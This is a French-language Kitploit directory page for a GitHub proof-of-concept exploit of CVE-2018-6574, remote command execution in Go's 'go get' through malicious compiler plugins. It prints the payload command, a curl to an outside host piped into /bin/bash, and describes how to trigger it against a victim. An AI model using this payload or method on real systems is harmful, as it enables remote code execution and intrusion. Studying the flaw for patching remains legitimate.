Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-6574 — Exploit de preuve de concept pour CVE-2018-6574, démontrant une exécution de commandes à distance dans la commande go get de Go via des plugins de compilateur malveillants lors de la construction du code source. | Kitploit
Outils/GitHubGitHub/frozenkp/cve-2018-6574
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubfrozenkp/cve-2018-6574

CVE-2018-6574

Exploit de preuve de concept pour CVE-2018-6574, démontrant une exécution de commandes à distance dans la commande go get de Go via des plugins de compilateur malveillants lors de la construction du code source.

Voir le dépôt
21il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-6574

Go avant 1.8.7, Go 1.9.x avant 1.9.4 et Go 1.10 pre-releases avant Go 1.10rc2 permettent l'exécution de commandes à distance via go get lors de la construction du code source, en exploitant la fonctionnalité de plugin gcc ou clang, car les arguments -fplugin= et -plugin= n'étaient pas bloqués. (de mitre)

Commande RCE

La commande a été compilée dans la bibliothèque dynamique calc_darwin.so. Et la commande actuelle est curl newton.cycarrier:8002 | /bin/bash. Elle a été utilisée comme accès initial d'un programme. Vous devez héberger un serveur de fichiers sur le port 8002 et lier l'hôte à votre IP.

Comment déclencher ?

Dans un premier temps, vous devez installer la version requise de golang sur la victime. Ensuite, hébergez ce dépôt sur un serveur git accessible. Enfin, utilisez la commande go get pour récupérer ce dépôt, et la commande sera exécutée automatiquement.

Prenez mon dépôt comme exemple. Vous devez utiliser la commande suivante :

root@kitploit:~
go get github.com/frozenkp/CVE-2018-6574

Avertissement

Ce dépôt est uniquement à des fins d'évaluation.

Télécharger l’outil